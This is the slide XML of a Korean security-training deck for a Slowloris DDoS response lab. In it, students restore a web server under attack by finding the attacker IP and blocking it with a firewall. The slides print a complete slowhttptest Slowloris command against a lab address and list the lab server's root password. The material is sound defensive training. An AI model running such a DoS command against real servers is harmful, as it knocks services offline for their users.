              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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BC968331-6BDC-4EF6-BD34-D24E17DAB382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr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B846F5E4-F54B-48E4-884D-8B11C27E605D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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1A05602-C5D7-4549-9695-4E18B65B363A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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21" name="화살표: 오른쪽 20">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B386215C-A1C0-4471-8A61-6BCBE3FCC914}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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3" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB54BA98-243A-4E14-B824-BBBE2268CC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01" t="17407" r="19467" b="25308"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="717195" y="3461755"/>
            <a:ext cx="456918" cy="463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53411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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000"/>
              <a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격 전 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>10.10.1.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버로 웹페이지 접속 시 접속 가능</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격서버에서 실습서버로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>slowloris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>slowhttptest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -c 4000 -g -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>slowloris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 10 -r 100 -t GET -x 3 -p 3 –u http://10.10.1.101 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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25" name="_x247859000">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078FAAE2-E477-41F2-AE13-F4AA63DAD5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180" y="670560"/>
            <a:ext cx="5400675" cy="3957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_x247860280">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9F8E71E-1C3D-4BB0-9660-B684439BC6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1145" y="890065"/>
            <a:ext cx="5400675" cy="323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267970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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>10.10.1.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버로 웹페이지 접속 시도 시 접속 불가</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(* history –w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>실행하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 저장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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049" name="_x247860760">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B72ABFF5-7366-4F3A-9D09-C0CF0485C4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180" y="688848"/>
            <a:ext cx="5400675" cy="391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_x247860440">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD29B156-1DFE-4589-BD6F-F7FF5BA3B0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9088" y="938784"/>
            <a:ext cx="3908425" cy="49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346147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E12DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>학생 화면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 교관공격 버튼 클릭 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Setup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>확인</a:t>
            </a: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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>관리자 화면에서 왼쪽 ‘교관 공격‘ 탭 클릭 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격하고자 하는 해당 문제번호와 할당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 확인 후 체크박스에 체크를 하고 공격실행 버튼 클릭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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2. ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격 실행’ 버튼 클릭 시 아래와 같이 완료 화면이 나오고 공격상태가 ‘공격 중’ 으로 변경 됨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16AF5780-4CBF-4818-A7ED-A29178744D8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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70375197-22D4-49A9-80A3-09AA59E55E97}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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70585ED-F006-4A17-AC42-528EB3578FCB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F43B545-E59E-47F8-8221-ABAE840F983B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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8195" name="_x208263200">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A08186A6-3DB0-4F8E-B9EF-FF437F7553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180" y="4096256"/>
            <a:ext cx="5400675" cy="168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7" name="_x208263760">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26418D75-9CC4-47C1-A243-5F1DFD1A47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1262" y="679233"/>
            <a:ext cx="4221163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9" name="_x208262880">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58C1B1EE-0438-4C58-9D22-CEC352F87B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1262" y="1958793"/>
            <a:ext cx="5400675" cy="1700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3" name="_x247863320">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9807132F-769D-4F8D-A491-7B45DF7F71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491"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="500181" y="906487"/>
            <a:ext cx="5400674" cy="2104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화살표: 오른쪽 14">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00733412-9AE5-4585-8405-12AC612CE9B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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611964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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3010DBED-3ABA-4169-8A96-F92BD8C53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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Training/Unit/Net/15</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 15. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Slowloris</a:t>
            </a:r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6A2CC12-A97B-4DB5-936F-E7C75CBB4AA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496053" y="3328503"/>
            <a:ext cx="4432683" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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대응</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="2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실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="7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현재 아파치 웹 서버가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Slowloris DoS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공격을 받아 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000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정상적인 서비스가 불가능한 상황이다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  <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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공격자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IP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를 식별하여 방화벽으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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차단하시오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000" dirty="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9A933898-9CDB-4360-99A0-123577882146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="580444" y="3328504"/>
            <a:ext cx="730420" cy="730420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1">
                    <a:lumMod val="75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5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Picture 14" descr="appendix icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF5A187-5DE1-4A4A-8190-F2DCF30DE9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5354" y="3380506"/>
            <a:ext cx="586243" cy="586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타원 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D901AF2-8468-4E57-A19A-D88B7F554DE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="3308419"/>
            <a:ext cx="730420" cy="730420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4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent4">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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36006CD-64B2-4E12-B317-9204AA016FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="3313578"/>
            <a:ext cx="4432682" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent4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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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참고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="7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사항</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="7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[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시스템 정보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   &lt;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실습서버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  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계정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: root / root123</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF9F62EB-7866-4E3F-8A25-E78C25AC4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559" y="2093753"/>
            <a:ext cx="677306" cy="677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9C59BC4E-1690-4F25-A340-257E8B4DCFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496054" y="2093753"/>
            <a:ext cx="4432682" cy="836832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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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교육</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="7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목표</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="200" dirty="0">
              <a:solidFill>
